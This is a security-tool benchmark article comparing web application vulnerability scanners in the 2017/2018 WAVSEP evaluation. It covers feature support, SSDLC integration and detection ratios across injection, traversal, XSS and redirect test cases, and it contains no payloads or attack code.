Security Tools Benchmarking

The 2017/2018 WAVSEP DAST Benchmark:

Evaluation of Web Application Vulnerability Scanners in Modern Pentest/SSDLC Usage Scenarios

By Shay Chen

Information Security Analyst, Researcher, and Speaker

November 10th, 2017 / Updated 31/01/2018
Assessment Environments: WAVSEP 1.7, WAVSEP-EXT, Various SPA Apps
Multiple content contributions by Achiad Avivi and Blessen Thomas

1. Introduction

Two years of preparations, development and research had finally come to fruition, and the 2017 WAVSEP benchmark is finally here.

It includes extremely useful information for anyone planning to integrate DAST scanners into SDLC processes, compares numerous features of commercial and open-source solutions, and demonstrates how far these technologies advanced and matured over the last decade.

Like the benchmarks published in previous years, WAVSEP covers the main contenders in the DAST (dynamic application security testing) field, both open source and commercial.

We did a couple of things different this time.

We've been to the field, integrated, and implemented the automated-periodic execution of the various tested solutions in real-life enterprise SDLC processes to test their effectiveness - gaining some real-life experiences to better help us understand the field and the requirements -

And during at least 4-5 long-term implementations of DAST/SAST/IAST solutions in SSDLC processes for financial / hi-tech / telcom organizations,
we attempted to directly and indirectly handle modern technologies (SPA/angular/react/etc) and complex architectures to see if the various vendor-proclaimed features actually work,
and with solutions ranging from prominent open source projects to high-end enterprise commercial solutions, that processes yielded some interesting conclusions.

Some of these experiences led us to develop test cases aimed to inspect issues in proclaimed features that we noticed didn't work as expected in actual implementations, and some to the creation of comparison categories that are apparently crucial for real-world implementations.

The wavsep evaluation test-bed (now at version 1.7) was expanded with additional test cases, and a new wavsep-mirror project called wavsep-ext was created to host JSON/XML test case variants.

Before discussing the actual content, I'd like to extend my deep gratitude to the various volunteers that assisted in obtaining and compiling the vast amount of information, and even more important, in compiling it to a (relatively) readable format. I'd also like to thank the vendors, which assisted us in licensing, unrealistic response times, and by pushing us to move forward with the evaluation.

And for the curious - a simple explanation to an expected question -

Why did the publication delay so long ?

Each benchmark is typically more complicated than the previous one, primarly because of our goal to cover additional aspects in each publication, which requires us to expand the test-beds (via the development of new test cases or usage of new test-beds).

Some of these "expansions" require unproportional amount of effort -

For example -

Some of the newly implemented test cases required the scanner to both crawl javascript/jquery/ajax driven web pages, and eventually scan entry points that expect JSON/XML input being sent through those pages.

During the test, many scanners surprisingly did NOT manage to crawl the JSON/XML pages (due to lack of relevant crawling features, bugs, or perhaps our specific implementation).

So, prior to scanning, for over 250+ different JSON/XML test cases, we had to manually teach the various tested tools the structure of the XML/JSON requests and parameters, or when we got lucky and had a valid license to a scanner that could crawl these new tests cases - chain the scanner to our various tools that couldn't.

Since these licenses typically expired just when we needed them... most of that work was manual, and thus, setbacks during these assessments became common, and QA session became longer and more time-consuming.

And with that out of the way, we can start cover this year's content -

2. Benchmark Overview

2.1 List of Tested Web Application Scanners

Evaluated commercial web application scanners:

Appspider v6.14.060 (Rapid7 ltd, acquirer of NTO)
Netsparker v4.8 (Netsparker ltd.)
Acunetix v11.0.x build 171181742 (Acunetix ltd.)
Burpsuite v1.7.23 (Portswigger)
WebInspect v17.10XX (HPE)
WebCruiser v3.5.4 (Janusec)

Evaluated open source scanners:

Zed Attack Proxy (ZAP) 2.6.0
Arachni 1.5-0.5.11
IronWASP 0.9.8.6
WATOBO v0.9.22

Previously evaluated / upcoming evaluations of commercial web application scanners:

Appscan v9.0.0.999 build 466 - 2014/2015 (IBM)
Syhunt Dynamic v5.0.0.7 RC2 - 2014/2015 (Syhunt)
N-Stalker Enterprise v10.14.1.7 - 2014/2015 (N-Stalker)(Results for new benchmark tests for most of these products will be updated soon in STM)

Legacy/Inactive commercial web application scanners results were not included (but are still included in the various charts in STM):

ParosPro v1.9.12 (Milescan)
JSky v3.5.1-905 (NoSec)
Ammonite v1.2 (RyscCorp)

Previously evaluated / upcoming evaluations of open source web application scanners:

W3AF 1.6
Vega 1.0
Wapiti 2.3.0
Skipfish 2.1.0
sqlmap 1.0
XSSer 1.6.1

In regard to vendors with newer production versions that were NOT evaluated, we either initially got a license which expired mid test and then didn't manage to contact the vendor in time (the contacts we had were unreachable / no longer worked for the vendor), or the budget and deadline we had for the project required us to restrict our coverage to a limited set of vendors.

Some of the unevaluated newer product versions will be covered in the upcoming weeks, while new and previously uncovered contenders may refer to the join-wavsep section in STM.

2.2 The Evaluation Criteria

The 2017 evaluation focused on several previously uncovered aspects, in addition to "repeating" most of the tests performed on previous benchmarks:

Covering the prominent vendors in 2017, and the newly introduced technologies in the field, and their effect on various users (penetration testers, SSDLC users).
Assessing the detection ratio of previously tested vulnerabilities in modern JSON/XML input vectors - to verify the proclaimed support for the attack vector in the various categories (extremely interesting results that affect the overall scores). For that purpose, MANY test cases were re-implemented with JSON/XML inputs, posing a challenge for both scanning features (covered in the article) and crawling features (will be discussed in future article updates)
Assessing the detection of additional vulnerabilities (OS Command Injection, repurposing XSS-via-RFI test to be used for SSRF evaluations as well).
The release of a new version of wavsep evaluation test-bed, available in wavsep git-hub and source-forge repositories.

The article attempts to simplify the presentation of content, and as a result, various additional elements will only be presented and updated through the benchmark presentation platform residing at STM (full and extensive list of features, scan logs, etc).

Before we start with the raw stats, it's important to cover a few subjects related to the technologies being evaluated:

2.3 The False Positive Aspect in Penetration-Tests / SSDLC

Depending on the vulnerability assessment process, false positives will typically have the following effect:

An (arguably) minor time consuming effect in external penetration tests (in the context of a manual-driven pentest)
A major time consumer in the overall scale of periodic automated scans within SSDLC scenarios

Weeding out a reasonable amount of false positives during a pentest is not ideal, but could be performed with relative ease. However, thousands upon thousands of false positives in enterprise SSDLC periodic scan scenarios can take their toll.

Replacing DAST technologies ("scanners") in black box penetration tests, a widespread and widely consumed commodity these days, does not seem likely in the visible future.
The concept of a black-box penetration test prevents inherently "intrusive" technologies (IAST/SAST) from being used by the external assessing entity in the vast majority of scenarios.

However, in SSDLC driven assessments (secure software development life-cycle), such as periodic scanning / build-triggered scanning, DAST technologies are challenged by SAST / IAST / Hybrid technologies.

Several years of fierce competition and the adoption of additional technologies for vulnerability detection (IAST / SAST / OSS) hasn't been easy for the various vendors, and even prompted certain entities to proclaim that DAST technologies are obsolete, and/or superceded by SAST/IAST technologies.

In the long run however, competition tends to have positive impacts on technology (and quality), and in the case of DAST vendors, in addition to enhanced technology support and adaptation, the detection ratio of exposures and ratio of false positive exposures in maintained DAST solutions was improved drastically, due to enhancements and a new DAST-related technology -

2.4 Enter Out-of-Band-Security-Testing (OAST) - Overview

The technological response of DAST vendors to the enhanced accuracy of Active IAST capabilities, whether intentional or unrelated, includes (among additional enhancements) tests falling under the category of Out-of-Band security testing (sometimes coined OAST, to match the typically used naming convention), a previously understated and an unprecedentedly accurate method of identifying second order vulnerabilities ("blind"/"indirect") and reducing false positives, keeping DAST technologies well within the race of relevant technologies.

The concept of OAST tests is to inject exploitation "payloads" that correspond with verification-servers in the internet, which are able to identify and associate external access to a specific vulnerability test in a specific scan.

So, let's say for example that an Out-of-Band SQL/XSS injection payloads were used in a scan and stored in the database, they may only be "executed" at a later phase, such as when an administrator views logs of application activities that include these payloads, or when a processing script is running on database content. While "normal" scanner injection tests would have likely missed the exposure, out-of-band exploitation payloads "report" to to the external server when executed, enabling the scanner to (eventually) identify the vulnerability.

Although out-of-band payloads are not yet included in all of the relevant scan "plugins" of the various vendors, the support for these tests is becoming more extensive, at least for some of the commercial vendors.

Coupled with the other accuracy enhancement in DAST technologies (algorithm/attack-tree improvements), out-of-band-testing can provide a huge boost to both detection accuracy and to the type of vulnerabilities automated scanning solutions (DAST in this case) are able to identify.

And now, to the main point -

3. Benchmark Results

The following sections cover the results of the feature comparisons and accuracy benchmarks of the various tools assessed.

FAQ

1) Why do the results differ from previous benchmarks?

The results in the various charts represent an aggregated score of four input vectors (GET/POST/XML/JSON), as opposed to previous benchmark which only included two input vectors (GET/POST).

The newly implemented test cases are only covered for the relevant attack vectors (e.g. attacks that can be executed via JSON/XML POST requests) such as LFI/RFI/Etc., and not for (mostly) irrelevant attack vectors (XSS/Unvalidated-Redirect/Backup-Files).

3.1 Input Delivery Vector Support (Updated)

The term "input delivery vector", or rather input delivery format, refers to the structure of inputs being used in the client-server communication to deliver values from the browser/mobile/client-application to the web server.
Examples can include query-string embedded parameters (GET), HTTP body parameters (POST), JSON arrays in the HTTP body (JSON), and so on.

Since the ability to parse, analyze and simulate attacks in input delivery vectors is key to weather or not DAST scanners will be able to identify vulnerabilities relevant to the parameter, I still consider the scanner's support for the tested application input delivery method to be the single MOST significant aspect in the selection process of any scanner.

Although it's not necessary to support every possible input delivery vector, the scanner should be able to scan the prominent input vectors used in the application to be effective.

The following table presents a prominent vector-support comparison between commercial DAST vendors:

Click to Enlarge

* burp-suite requires changing the default configuration for effective AMF scan support
* burp-suite requires the "GWT Insertion Points" extension for effective GWT scan support

The following table presents a prominent vector-support comparison between open source DAST tools:

Click to Enlarge

* zap effective support of AMF scanning is unclear (a project was initiated) and requires the installation of an optional "AMF" plugin from the store
* w3af has open and active projects to develop support for REST API/JSON and AMF support. Unknown schedule/release date.
* Bugs in IronWASP JSON/XML support prevent it from effectively parsing and scanning JSON/XML inputs.May be related to improper content-types.

Although the interpretation of the results is left to the reader, it's important to note that lack of support for prominent input vectors limits the capabilities of scanners in relevant test scenarios, particularly in various payload injection tests.

The definition of prominent input vectors changes between applications, and require the tester to "profile" the input vectors in use in the application, to identify the input formats crucial for scanners to support.

It is well worth mentioning that burp-suite, zap, ironwasp and arachni (and in theory, other tools with fuzz testing capabilities) support custom input vectors (e.g. scanning ANY part of the protocol) - typically by configuring specific sections in HTTP requests (useful for limited testing of "unsupported" delivery methods). Furthermore, burp-suite and zap seem to support scanning/testing raw websockets (e.g. scanning non-HTTP protocols), which might be useful for certain assessments.

To my best knowledge currently only zap supports out-of-the-box scanning of odata-id vectors (with webinspect planning support it upcoming publications), while DOM related vectors were not evaluated in this article for any of the contenders.

Full charts will be available in the upcoming update to STM.

3.2 Support for Overcoming Modern Scan Barriers (Altered)

Ever tried to run a scanner against a website, and it "just didn't work" ?
Apart from the lack of support of relevant input vectors (JSON/XML/etc), or an ineffective crawling mechanism, there's additional "barriers" that can prevent a scanner from successfully testing a target.

Support for replaying CSRF parameters/headers, support for including multiple domains in the scope of a single scan (crucial for SPA micro service architecture), and similar key elements are required to successfully scan modern applications, particularly in the context of periodic BDD/TDD assessments.

The following table compares the scan barrier support of commercial DAST scanners:

Click to Enlarge

* burp-suite support for recording/re-performing login / in-session detection currently relies on the macro feature
* burp-suite has de-facto support of SPA with multiple domains, due to the testers ability to include any domain in scope
* burp-suite support anti-CSRF tokens via the CSurfer extension or the macro feature (Run a post-request macro)
* Acunetix support for multiple domains requires a set-up an additional Target and then adding the secondary Target as an "Allowed Host" to the first Target.
(Targets > TARGET_NAME > Advanced > Enabling "Allowed Hosts" and picking the other Target you want to include as part of the scan)
* The angular/react crawling support is based on vendor claims, and was not yet evaluated through a dedicated benchmark
* Some of the missing features can be "externally" supported, by forwarding traffic through burpsuite/zap/fiddler with auth/match-and-replace rules

The following table compares the scan barrier support of open-source DAST scanners:

Click to Enlarge

* ZAP supports re-performing authentication via built-in authentication features and zest scripts, as shown in the following article
* Subgraph vega supports authentication recording via macros
* Any scanner that has tree-view manual scan support can at least partially support scans of SPA with multiple domains
* Some of the missing features can be "externally" supported, by forwarding traffic through burpsuite/zap/fiddler with auth/match-and-replace rules
* ZAP/IronWASP angular/react crawling is possible only through browser based crawling (crawljax/etc). Requires configuration/dependencies.
* W3AF anti-CSRF plugin seems to be only partially implemented (false-negatives)

3.3 Support for Crucial SSDLC Integration Features (New!)

As opposed to manual security assessments, and performance in detection accuracy tests aside, to be able to efficiently use DAST tools in SSDLC, the scanner typically needs to support several key features -

Although NOT all of the features are required for each SSDLC integration, some can be useful or even necessary, depending on the process goals and requirements:

Defect Tracking Integration - support reporting "vulnerabilities" directly to defect tracking repositories such as JIRA/TFS/Bugzilla/Trac/etc.

Continuous Integration Support (BDD) - support for CLI/API/plugin-based scanning through external continues-integration / build-management software such as Jenkins. De-facto external support for scheduled scans.

Selenium Import/Integration (TDD) - importing crawling results or otherwise integrating with selenium scan scripts.

Periodic/Scheduled Scans - built-in scheduled scans (also possible through continues integration support through CLI/API/plugins)

Periodic Results Gap Analysis - analyze and presents results diff between scans, or otherwise compare periodic scans.

IAST Module Hybrid Analysis - although classified under different categories, some products have both DAST and IAST modules, and are further able to combine their results through scans in what is typically called Hybrid-Analysis, and integrate them in TDD/BDD scenarios.

SAST Module Hybrid Analysis - In a similar manner, either through collaboration or built-in features, some vendors (typically commercial) have both DAST and SAST modules, or are otherwise able to use "hybrid-analysis" with results of external SAST tools, potentially getting the "best" out of both worlds. DOM-focused SAST mechanisms were NOT considered full SAST modules for the purpose of this article.

Extensibility - the ability to extend the scanner with custom plugins, tests and scripts.

WAF Virtual Patch Generation - the ability to generate a virtual patch rule for a WAF out of scan results/vulnerabilities identified.

Enterprise Console Management Features - the ability to manage results in a graphical user interface - view charts/lists, mark false positives, search, import, export and classify results, etc. A full check-mark is awarded to products with homegrown on-premise solutions (to support finance/defense sector closed networks), while a half-check-mark is awarded to cloud solutions that can be used "indirectly" to scan internal solutions and presents results in an enterprise-like console, or to solutions with 3rd party enterprise console integration (e.g. threadfix, seccubus, etc).

The comparison tables attempted to present both the built-in support for features (full check-mark), and support through integration with 3rd party products (cross-check-mark).

The following table presents a comparison of built-in/external prominent SSDLC feature support in commercial DAST tools:

Click to Enlarge

Comparison notes:

* SAST modules are typically included in 3rd party products and require additional costs. IAST modules (for whatever reason, and lucky for us) are typically included in the pricing of the commercial DAST web application scanner.

* WAF virtual patching rule generation support is WAF specific and varies between vendors: Netsparker supports rule generation for ModSecurity, Acunetix supports F5/Fortinet/Imperva, AppSpider supports F5/Fortinet/Imperva/Akamai/DenyAll/ModSecurity/Barracuda, Appscan/Webinspect support virtual patch generation for various WAFs (missing list), and 3rd party interfaces such as Threadfix can create virtual patch rules for WAFs from the results of multiple supported scanners.

* Usage of external management frameworks (BDD-Security, Seccubus, ThreatFix, DefectDojo, Farady, Dradis, Jenkis + CLI) is able to "compensate" for MANY of the missing SSDLC features of supported scanners, by parsing scanning reports and converting issues to virtual patch rules/defect tracking entries, periodic result gap analysis, defining externally scheduling scans, etc. The table uses a check-mark to signify built-in feature support, and half-cross/half-check-mark for external support through 3rd-party software or plugin.

* Netsparker on-premise centrlized management frame is availble through an on-premise installation of netsparker cloud.

* In particular - burpsuite virtual patching rule generation is available through external mod-security scripts or through threatfix integration.The same applies for "indirect" defect tracking support, "enterprise-console" vulnerability management features, and scan scheduling scheduling, which is possible by combining jenkins/team-city/sonar-cube with any scanner CLI interface.

* articles describing methods of "automating" scans with burpsuite:
   https://www.securify.nl/blog/SFY20160901/burp-suite-security-automation-with-selenium-and-jenkins.html

* recent updates to burp CLI interface, external plugins makes it possible to use it in some CI scenarios - the extent is still verified by the author:
   http://releases.portswigger.net/2017/

* various external projects provide some interfaces to use burpsuite with selenium, such as: https://github.com/malerisch/burp-csj

* Methods for manual/external selenium integration with Netsparker / Burpsuite are officially documented:
   https://www.netsparker.com/blog/docs-and-faqs/selenium-netsparker-manual-crawling-web-applications-scanner/
   https://support.portswigger.net/customer/portal/articles/2669413-using-burp-with-selenium
   Similar methods could be used with webcruiser as well.

* enterprise console management features are integrated into appscan/webinspect enterprise versions. Other products may support the features either in cloud product variations or through integration with a 3rd party product (e.g. Threadfix, DefectDojo, etc).

* Webinspect/Appscan SAST modules hybrid-analysis features are actually more integrations with Fortify (webinspect) and Appscan-source. 3rd party products are also capable of performing hybrid analysis on seemingly unrelarted products.

The following table presents a comparison of built-in/external prominent SSDLC feature support in open source DAST tools:

Click to Enlarge

Comparison notes:

* Usage of external management frameworks (BDD-Security, Seccubus, ThreatFix, DefectDojo, Farady, Dradis, Jenkis + CLI) is able to "compensate" for MANY of the missing SSDLC features of supported scanners, by parsing scanning reports and converting issues to virtual patch rules/defect tracking entries, periodic result gap analysis, defining externally scheduling scans, etc. The table uses a check-mark to signify built-in feature support, and half-cross/half-check-mark for external support through 3rd-party software or plugin.

* In particular - zap / arachni / w3af / skipfish Virtual Patching rule generation is available through external mod-security scripts or through threatfix integration.The same applies for "indirect" defect tracking support, "enterprise-console" vulnerability management features, and scan scheduling scheduling, which is possible by combining jenkins/team-city/sonar-cube with any scanner CLI interface.

* arachni custom parsing of json is reported to being used to update jira defect tracking system:
https://www.newcontext.com/automate-web-app-security-scanning/

* selenium support is available/partially available for some of the tools using the following methods:
** arachni uses selenium webdrivers for login scenarios, support for importing selenium crawl results is unknown.
** Unofficial plugins for using w3af with selenium has been published: https://dumpz.org/16826/
** External IronWASP selenium Integration module: https://github.com/arorarajan/IronWaspSelenium/tree/V1
** Guides for using selenium through ZAP are available (while using various projects) - the process could theoritically be used for other scanners with proxy capabilities:
https://linkeshkannavelu.com/2015/01/08/security-test-automation-using-selenium-and-zap/
https://securify.nl/blog/SFY20160601/using_owasp_zap__selenium__and_jenkins_to_automate_your_security_tests_.html
https://www.coveros.com/running-selenium-tests-zap/

In general, although some of the tools contain built-in SSDLC related features, 3rd party software (ThreadFix / DefectDojo / Dradis / Seccubus / BDD-Security / Faraday / Jenkins) can enhance the scanner capabilities through external features and integration.

These solutions typically have either commercial and/or integration costs, but may be able to allow using most of the tools in SSDLC scenarios with some integration effort, while providing the various benefits of a commercial-scale managed platform.

3.4 The Detection Ratio of OS Command Injection (New!)

To expand the coverage of the benchmark evaluated features, dedicated test cases were implemented to simulate entry points vulnerable to OS command injection.

Unlike most of the previous benchmark evaluations, this year's benchmark included test cases with JSON/XML support (primarly implmented in the extension project wavsep-ext).
In total, the OS-command injection benchamrk included 224 NEW test cases, half of which were with JSON/XML inputs.

The following table presents the OS Command Injection detection / false-positive ratio of commercial DAST vendors:

OS Command Injection Benchmark - Commercial Vendors - Click to Enlarge

* missing results from 2-4 additional commercial vendors will be updated in the upcoming weeks.
* In order to get to a score of 100% with Netsparker, it's required to disable the "content optimization features", otherwise the score will be 45.98%.
Since WAVSEP test cases look very similar to each other (rare in real life applications), various products with scan optimization features may ignore some of the test cases since they will be categorized as "identical pages", and thus scanning may require similar configurations in other products as well.
To disable it Hold Down CTRL WHILE Clicking "Options"->Change "DisableContentOptimization" to TRUE, Save and Restart Netsparker.

The following table presents the OS Command Injection detection / false-positive ratio of open source DAST projects:

OS Command Injection Benchmark - Open Source Vendors - Click to Enlarge

3.5 The Detection Ratio of Remote File Inclusion/SSRF (Altered)

Although (XSS via) remote file inclusion (RFI) test cases were covered in previous benchmarks, in terms of exploitation, we didn't treat them as potential SSRF (server-side request forgery) vulnerable entry points, an exploitation method which is (arguably) more severe then XSS-via-RFI.

This year we included both RFI and SSRF plugins in the scans of the original "RFI" test cases, which might have affected the results.
Furthermore, as in the case of OS command injection, NEW test cases for JSON/XML inputs were implemented for SSRF/RFI, effectively doubling the number of tests from 108 to 216 valid test cases (108 NEW test cases), with the previous 6 false positive categories remaining intact.

However, at the moment, new "blind" SSRF test cases were not (YET) included in the benchmark, due to time-frame and licensing constraints, so evaluations of out-of-band SSRF detection mechanisms are still pending.

The following table presents the RFI / SSRF detection / false-positive ratio of commercial DAST vendors:

RFI / SSRF Benchmark - Commercial Vendors - Click to Enlarge

* results from previous benchmarks might be DRASTICALLY different due to the introduction of 108 NEW JSON/XML test cases.
* the GET/POST only results of Appscan, Syhunt and N-Stalker were intentionally not published as to avoid misinterpretation. The products updated results might be published in the upcoming weeks.

The following table presents the RFI / SSRF detection / false-positive ratio of open source DAST projects:

RFI / SSRF Benchmark - Open Source Vendors - Click to Enlarge

* results from previous benchmarks might be DRASTICALLY different due to the introduction of 108 NEW JSON/XML test cases.

3.6 The Detection Ratio of Path Traversal (Update)

The evaluation used the same Path-Traversal/LFI test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 816 valid test cases, and 8 false positive categories. Due to some automation methods on our part, the interpretation of certain false-positive test cases might be more severe than in previous benchmarks.

The following table presents the Path Traversal detection / false-positive ratio of commercial DAST vendors:

Path Traversal Benchmark - Commercial Vendors - Click to Enlarge

* due to incomplete QA processes on our behalf, the results of Acunetix and Webinspect may require an update in the next few weeks.

The following table presents the Path Traversal detection / false-positive ratio of open source DAST vendors:

Path Traversal Benchmark - Open Source Vendors - Click to Enlarge

* due to incomplete QA processes on our behalf, the results of WATOBO and arachni may require an update in the next few weeks.

3.7 The Detection Ratio of SQL Injection (Update)

The evaluation used the same SQL injection test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 136 valid test cases, and 10 false positive categories. Load related issues may have slightly affected results (a typical problem with sql injection scanning due to time based plugins / connection pool issues), but the overall results remain intact.

The following table presents the SQL Injection detection / false-positive ratio of commercial DAST vendors:

SQL Injection Benchmark - Commercial Vendors - Click to Enlarge

The following table presents the SQL Injection detection / false-positive ratio of open source DAST projects:

SQL Injection Benchmark - Open Source Vendors - Click to Enlarge

* ZAP vanilla installation gets about 75% detection, as opposed to the high result of previous benchmarks, and only yielded a result similar to previous benchmarks after installing the beta/alpha active scan plugins and configuring Low/Insane detection ratios. these additional plugins also seem to yield a significant amount of false positives.

3.8 The Detection Ratio of Reflected Cross Site Scripting (Update)

The evaluation used the same XSS test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 66 valid test cases, and 7 false positive categories.

The following table presents the XSS detection / false-positive ratio of commercial DAST vendors:

Reflected XSS Benchmark - Commercial Vendors - Click to Enlarge

The following table presents the XSS detection / false-positive ratio of open source DAST projects:

Reflected XSS Benchmark - Open Source Vendors - Click to Enlarge

* arachni's "imperfect" score seems to be intentional - since the project removed support for VBscript related XSS tests due to their lack of relevance to modern browsers and modern websites. the only test cases currently missed by the project are VBScript XSS test cases.

3.9 The Detection Ratio of Unvalidated Redirect (Update)

The evaluation used the same unvalidated-redirect test-bed used in the previous benchmarks, and focused only on GET input delivery vectors in total of 30 valid test cases, and 9 false positive categories (vulnerable unvaliataed redirect POST entry points only contribute to phishing credibility in indirect session-storing/multi-phase scenarios, and these were not covered in the benchmark).

The following table presents the unvalidated redirect detection / false-positive ratio of commercial DAST vendors:

Unvalidated Redirect Benchmark - Commercial Vendors - Click to Enlarge

* The results of appscan DO NOT REFLECT the latest version of the product - which is still under evaluation. they have already proclaimed that they have drastically improved the result from the previous version.

The following table presents the unvalidated redirect detection / false-positive ratio of open source DAST projects:

Unvalidated Redirect Benchmark - Open Source Vendors - Click to Enlarge

3.10 The Detection Ratio of Backup/Hidden Files (Update)

The backup file results will be published in the upcoming weeks, due to vendor specific-bugs, licensing issues and time-frame constraints.

Friday, November 10, 2017

WAVSEP 2017/2018 - Evaluating DAST against PT/SDL Challenges

1. Introduction

2. Benchmark Overview

2.1 List of Tested Web Application Scanners

2.2 The Evaluation Criteria

2.3 The False Positive Aspect in Penetration-Tests / SSDLC

2.4 Enter Out-of-Band-Security-Testing (OAST) - Overview

3. Benchmark Results

3.1 Input Delivery Vector Support (Updated)

Click to Enlarge

Click to Enlarge

3.2 Support for Overcoming Modern Scan Barriers (Altered)

Click to Enlarge

Click to Enlarge

3.3 Support for Crucial SSDLC Integration Features (New!)

Click to Enlarge

The following table presents a comparison of built-in/external prominent SSDLC feature support in open source DAST tools:

Click to Enlarge

3.4 The Detection Ratio of OS Command Injection (New!)

OS Command Injection Benchmark - Commercial Vendors - Click to Enlarge

OS Command Injection Benchmark - Open Source Vendors - Click to Enlarge

3.5 The Detection Ratio of Remote File Inclusion/SSRF (Altered)

RFI / SSRF Benchmark - Commercial Vendors - Click to Enlarge

RFI / SSRF Benchmark - Open Source Vendors - Click to Enlarge

3.6 The Detection Ratio of Path Traversal (Update)

Path Traversal Benchmark - Commercial Vendors - Click to Enlarge

Path Traversal Benchmark - Open Source Vendors - Click to Enlarge

3.7 The Detection Ratio of SQL Injection (Update)

SQL Injection Benchmark - Commercial Vendors - Click to Enlarge

SQL Injection Benchmark - Open Source Vendors - Click to Enlarge

3.8 The Detection Ratio of Reflected Cross Site Scripting (Update)

Reflected XSS Benchmark - Commercial Vendors - Click to Enlarge

Reflected XSS Benchmark - Open Source Vendors - Click to Enlarge

3.9 The Detection Ratio of Unvalidated Redirect (Update)

Unvalidated Redirect Benchmark - Commercial Vendors - Click to Enlarge

Unvalidated Redirect Benchmark - Open Source Vendors - Click to Enlarge

3.10 The Detection Ratio of Backup/Hidden Files (Update)